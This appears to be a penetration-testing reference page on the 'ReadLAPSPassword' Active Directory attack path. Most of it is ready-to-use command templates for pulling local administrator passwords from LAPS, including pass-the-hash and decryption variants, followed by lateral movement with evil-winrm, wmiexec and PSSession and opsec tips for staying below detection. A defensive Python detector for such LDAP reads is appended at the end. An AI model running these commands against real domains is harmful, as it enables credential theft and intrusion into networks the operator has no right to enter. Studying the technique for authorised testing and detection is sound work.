ReadLAPSPassword

Source principal can read the local administrator password stored in LAPS for the target computer.

Applies to: User/Group/Computer → Computer


Linux Abuse

NetExec

# Legacy LAPS (ms-Mcs-AdmPwd)
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> -M laps

# Windows LAPS 2023 (msLAPS-Password); limit to one host with the module's COMPUTER option
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> -M laps -o COMPUTER=<target-computer>

bloodyAD

# Legacy LAPS
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Windows LAPS 2023
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=computer)' \
  --attr msLAPS-Password,msLAPS-EncryptedPassword

ldapsearch

ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
  -b 'DC=<domain>,DC=<tld>' \
  '(ms-mcs-admpwdexpirationtime=*)' ms-mcs-admpwd ms-mcs-admpwdexpirationtime

Pass-the-Hash variant (bloodyAD)

# bloodyAD takes the hash through -p in LM:NT form; the LM half may be left empty
bloodyAD -u <username> -p ':<ntlm-hash>' -d <domain> --host <dc-ip> get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Decrypt Windows LAPS 2023 encrypted attribute

# lapsv2decrypt (dotnet tool)
# https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
lapsv2decrypt <base64-encrypted-value>

Windows Abuse

PowerView

# Legacy LAPS
Get-DomainComputer <target-computer> -Properties cn,ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# All LAPS-enabled computers
Get-DomainComputer -Filter '(ms-mcs-admpwdexpirationtime=*)' -Properties cn,ms-mcs-admpwd

Microsoft LAPS PowerShell Module (Windows LAPS 2023)

Get-LapsADPassword "<target-computer>" -AsPlainText

Native AD Module

Get-ADComputer <target-computer> -Properties ms-Mcs-AdmPwd | Select-Object Name,ms-Mcs-AdmPwd

After retrieving the password: lateral movement

# PSSession with recovered LAPS cred
$laps = ConvertTo-SecureString '<laps-password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('.\Administrator', $laps)
Enter-PSSession -ComputerName <target-computer> -Credential $cred

# Linux: evil-winrm or wmiexec with the LAPS password
evil-winrm -i <target-computer> -u Administrator -p '<laps-password>'
wmiexec.py 'Administrator:<laps-password>@<target-computer>'

Opsec

  • Reading LDAP attributes generates minimal noise; only detectable with LDAP query-level monitoring (e.g. Event ID 1644 or LDAP audit policy)
  • NetExec LAPS module may generate multiple LDAP binds; use -k with Kerberos for reduced credential noise
  • Windows LAPS 2023 encrypted passwords require the machine's AD computer account to decrypt; recovery from Linux requires lapsv2decrypt
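Detection logic for the LDAP query-level monitoring point above, as an added example that is not part of the original page: it scores LDAP search records for requests of the LAPS secret attributes named on this page and flags bulk reads or one principal touching many hosts. The record layout, field names and sample searches are constructed assumptions; map your own LDAP audit source onto them.

```python
import re
from collections import namedtuple

# Constructed record shape for one LDAP search; map your audit source (DC log, LDAP proxy) onto it.
LdapSearch = namedtuple("LdapSearch", "bind_user client_ip base_dn search_filter attributes")
# Attribute names that carry the LAPS secret (lower-cased for comparison).
LAPS_SECRET_ATTRS = {"ms-mcs-admpwd", "mslaps-password", "mslaps-encryptedpassword"}
# Filters that select every LAPS-managed computer instead of one host.
BULK_FILTER = re.compile(
    r"^\((ms-mcs-admpwdexpirationtime=\*|mslaps-passwordexpirationtime=\*|objectclass=computer)\)$", re.I)
# Filter clauses that pin one computer, e.g. (cn=WS01) or (sAMAccountName=WS01$).
HOST_CLAUSE = re.compile(r"\((?:cn|name|samaccountname|dnshostname)=([^)*]+)\)", re.I)

def classify(rec):
    """None if no LAPS secret can come back; otherwise ('bulk'|'targeted', host)."""
    wanted = {a.lower() for a in rec.attributes}
    # [] or '*' asks for every readable attribute, which includes the LAPS
    # secret for a principal holding the read right, so treat it as a request.
    if wanted and "*" not in wanted and not (wanted & LAPS_SECRET_ATTRS):
        return None
    f = rec.search_filter.replace(" ", "")
    if BULK_FILTER.match(f):
        return ("bulk", "*")
    m = HOST_CLAUSE.search(f)
    host = m.group(1).rstrip("$").upper() if m else rec.base_dn
    return ("targeted", host)

def review(records, max_hosts=3):
    """Aggregate hits per bind user; flag bulk reads or > max_hosts distinct hosts."""
    per_user = {}
    for rec in records:
        hit = classify(rec)
        if hit is None:
            continue
        entry = per_user.setdefault(rec.bind_user, {"bulk": 0, "hosts": set()})
        if hit[0] == "bulk":
            entry["bulk"] += 1
        else:
            entry["hosts"].add(hit[1])
    flagged = [u for u, e in per_user.items() if e["bulk"] or len(e["hosts"]) > max_hosts]
    return per_user, sorted(flagged)

# Constructed sample searches (not real audit data).
SAMPLE = [
    LdapSearch("CORP\\jdoe", "10.0.0.5", "DC=corp,DC=local", "(ms-mcs-admpwdexpirationtime=*)",
               ["ms-mcs-admpwd", "ms-mcs-admpwdexpirationtime"]),
    LdapSearch("CORP\\helpdesk1", "10.0.1.7", "DC=corp,DC=local", "(cn=WS01)", ["msLAPS-Password"]),
    LdapSearch("CORP\\helpdesk1", "10.0.1.7", "DC=corp,DC=local", "(sAMAccountName=WS02$)", ["*"]),
    LdapSearch("CORP\\inventory", "10.0.2.9", "DC=corp,DC=local", "(objectClass=computer)", ["cn", "operatingSystem"]),
]
```

Lower `max_hosts` to match how many LAPS passwords a helpdesk role legitimately reads per window; the wildcard-attribute case is scored on purpose, since a `*` request returns the secret to anyone holding the read right.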